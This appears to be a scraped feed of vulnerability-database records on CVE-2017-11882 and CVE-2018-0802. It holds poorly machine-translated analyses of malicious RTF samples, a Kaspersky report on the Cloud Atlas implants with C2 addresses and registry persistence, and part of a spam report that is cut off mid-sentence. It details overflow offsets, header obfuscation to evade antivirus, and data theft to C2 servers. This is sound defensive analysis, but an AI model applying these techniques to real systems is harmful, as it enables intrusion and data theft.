the 0x089E at the beginning to the end. \n! [](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png! small) \nThe first part of the shellcode to jump to the second part of the compilation command as shown below: \n! [](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png! small) \nAfter analysis, found that the segment of shellcode, a series of jmp jump instruction operation, due to shellcode obfuscation and protection. For example, the following figure shows: \n! [](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png! small)\n\n**[1] [[2]](<92253_2.htm>) [next](<92253_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-02T00:00:00", "type": "myhack58", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-02T00:00:00", "id": "MYHACK58:62201892253", "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-25T17:29:45", "description": "! [](/Article/UploadPic/2018-12/20181225205545726. png) \nRecently intercepted an extension doc word document to attack the samples, which format is actually RTF format. By analyzing the document composition the use of a cve-2017-11882 and cve-2018-0802 vulnerability, and use the embedded excel object is used to trigger the vulnerability. The release of the PE file is used to collect the target user's sensitive information. \n\nFirst, the basic situation \nIn the experimental environment win764, the Office 2010 open the document, process monitoring, found that the winword process is executed after the \u9996\u5148\u6267\u884cexcel.exe that \u7136\u540e\u8fd0\u884cEQNEDT32.exe that \u63a5\u7740\u8fd0\u884ccmd.exe finally run A process. X, in which EQNEDT32. exe running twice. \u770b\u5230EQNEDT32.exe bottle feel should be cve-2017-11882 or cve-2018-0802 samples. \nThe document is opened, display as a empty document, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545737. png) \nOn the figure, inadvertently probably thought it was empty, in fact, a closer look, found the top left a small black point icon. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545312. png) \nDouble-click the Find pop-up window, as shown below. Display the\u201cwindows cannot open this file: A. X\u201d. Obviously, the\u201csmall black dot\u201dshould be an external object. \n! [](/Article/UploadPic/2018-12/20181225205545780. png) \nRight-click the object, select\u201cpackager shell object\u201dobject, you can view the object's\u201cproperties\u201d. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545220. png) \nIts object properties as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545229. png) \nSee here, we it can be concluded that: the sample should be is to use the RTF is embedded in a PE object in the open document when the default release to the%temp%directory, then use cve-2017-11882 or cve-2018-0802 execution of the process. \n\nSecond, the RTF analysis \n1, the document structure analysis \n! [](/Article/UploadPic/2018-12/20181225205545186. png) \nUse rtfobj attack on the document analysis, finding its embedded two objects, respectively, is a package object and an Excel. Sheet. 8 object. As shown in Fig. Package object the original file is\u201cC:\\\\\\Users\\\\\\n3o\\\\\\AppData\\\\\\Local\\\\\\Microsoft\\\\\\Windows\\\\\\INetCache\\\\\\Content.Word\\\\\\A.X\u201dit. From this it can be seen, the author of the document[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)user name: n3o on. \nWherein A. X is the release of the malicious PE file. \nThe other one is an embedded excel table object, we put the extract of the excel table the suffix renamed. xls after excel is opened. Find it contains two objects AAAA and bbbb are\u201cEquation. 3\u201dthe object, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545928. png) \nTo extract the excel table object, which is the document structure as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545742. png) \nThe table includes two CLSID for\u201c0002ce02-0000-0000-c000-000000000046\u201dMicrosoft Equation 3.0 object MBD0002E630 and MBD0002E631, you can see the modification time for the 2018/5/21 17:of 52. \n! [](/Article/UploadPic/2018-12/20181225205545793. png) \nIn addition, two\u201cMicrosoft Equation 3.0\u201dobject. Ole10Native size of 59 bytes and 160 bytes, which contains a\u201ccmd.exe /c %tmp%\\A. X\u201dused to perform A. The X process. Should be used in combination for cve-2017-11882 and cve-2018-0802 two vulnerabilities. \nThus, we can fundamental analysis clear the sample, the overall flow diagram as the following figure shown. \n! [](/Article/UploadPic/2018-12/20181225205545654. png) \n2, the static document \nUse winhex to open, you can find the first package object in File 0x2A8A. Wherein 0x00137158 refers to the size of the object, that is, the decimal 1274200, it is the release of A. X size. Followed by IS PE file in winhex we can see that the author put the PE head 0x4D5A has been modified, inserted in the middle 0x090d is divided, so that it becomes[0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d], in fact, is 0x4d5a, such an operation should be in order to avoid certain anti-virus of Avira, not directly to 0x4d5a9000 the look of the rendering, a look that is clearly of the PE file. Specific as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545840. png) \nAnother object in 0x299061 position, is an Exce. Sheet. 8 object. Its size is 0x00005C00, that is, the decimal 23552, and rtfobj extracted exel size consistent. The author of the compound document header has changed, with 0x0909 is divided, so that d0cf11 at the beginning of the composite document into the d[0x0909]0[0x0909]\u3002 Should also be a certain sense of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)\n\n**[1] [[2]](<92510_2.htm>) [[3]](<92510_3.htm>) [next](<92510_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-25T00:00:00", "type": "myhack58", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-09T12:10:51", "description": "Prior to inadvertently give a very interesting rtf document, the sandbox where the behavior of a pile, the document itself and confuse the very clear odd, so spend a little time to analyze this sample. Substantially clear the sample of the attack techniques and attack the chain, the open part of the analysis process, the sample and data for your reference. \nSpecial thanks to Flygend provide the intelligence and the silver Yan ice during the analysis about the shellcode understand the confusion of support \n0x00 sample basic information \nThe sample is an rtf document, first upload the VT time is 10 months 24 days, is located by the China the user through the web upload. \n! [](/Article/UploadPic/2018-11/201811914344718. png) \nUse the editor to view the sample can be learned from sample of embedded OLE objects through the confusion. \n! [](/Article/UploadPic/2018-11/201811914345322. png) \nUnable to use the tool to extract the OLE objects of the premise, the use of silver Yan ice to inform the method, successfully acquired the Equation. 3 objects, and in stream flow found in the part of the suspected shellcode data. \n! [](/Article/UploadPic/2018-11/201811914345629. png) \nAnalyzing and sorting samples of landing process chain is as follows: \nWinword.exe \nEQNEDT32.EXE \nMSCLTPAA.exe \nDXDriver.dll \n_XDSFA_XVGVGGH. dmp \n\n0x01 doc document analysis process \nFirst, you can see the document of the ole object is a serious confusion. Then you need to let the memory to load the ole object, and dump it out, see the following commissioning elements: \n! [](/Article/UploadPic/2018-11/201811914345482. png) \nFor Eqnedt32. exe to register the debugger, run the rtf documents, find the doc file will trigger the cve-2017-11882 vulnerability, the specific copy of the content shown in the following figure the red box the circle the part will trigger the vulnerability: the \n! [](/Article/UploadPic/2018-11/201811914345596. png) \nStack frame structure the following box and red circle out of the section, respectively, as a function of the return address and pressed into the first parameter of: \n! [](/Article/UploadPic/2018-11/201811914345268. png) \nThe following screenshots you can see that strlen returns the result to 0x30, and you want to copy to the stack in the location of ebp-0x28, so there will be 8 bytes of the overflow, replace the function return address is 0x410db7 it. And 0x410db7 location of the instruction is a ret, so the second bounce of the stack, the EIP is assigned the value of this function is the first parameter, which is 0x18f354. \n! [](/Article/UploadPic/2018-11/201811914345951. png) \nThe program runs to the next figure, the implementation of the first paragraph of the shellcode is. This section of shellcode behavior: jump to the current esp+0x2c8\uff080x18f4a4 points to the memory area 0x5a88f0 it. \n! [](/Article/UploadPic/2018-11/201811914345847. png) \nThe decryption is finished after the jump to the real shellcode \n! [](/Article/UploadPic/2018-11/201811914345718. png) \nThrough the figure above that, the shellcode in the heap, so only not turned on dep in the environment in order to run the second paragraph of the shellcode is. \nThe second paragraph of the shellcode first XOR decryption, the decryption is completed, a jump to the function entry. This shellcode hard coding a lot of strings and the API address, and encryption. The first half of through a lot of string concatenation and padding method, to generate will be the release of files to a directory and you want to load the dll name. \n! [](/Article/UploadPic/2018-11/201811914345997. png) \n! [](/Article/UploadPic/2018-11/201811914345664. png) \nAccess to the registry key, set the start on boot: \n! [](/Article/UploadPic/2018-11/201811914345596. png) \nThe enumeration process the anti-debugging: \n! [](/Article/UploadPic/2018-11/201811914345784. png) \nRelease file: \n! [](/Article/UploadPic/2018-11/201811914345158. png) \nThe MSCLTLAA. exe for string2Byte after decryption, the resulting PE file. \n! [](/Article/UploadPic/2018-11/201811914346672. png) \nCreate MSCLTPAA. exe and then write the decrypted data. \n! [](/Article/UploadPic/2018-11/201811914346300. png) \n! [](/Article/UploadPic/2018-11/201811914346711. png)\n\n**[1] [[2]](<91962_2.htm>) [[3]](<91962_3.htm>) [next](<91962_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-11-09T00:00:00", "type": "myhack58", "title": "The use of a posture clear odd 11882 format overflow document analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2018-11-09T00:00:00", "id": "MYHACK58:62201891962", "href": "http://www.myhack58.com/Article/html/3/62/2018/91962.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2019-08-12T19:33:22", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12093813/abstract-cloud-990x400.jpg)\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victims - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. \n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower ;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can't be searched via file hash on the host.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15084744/spam_report_q1_2019-990x400.jpg)\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, 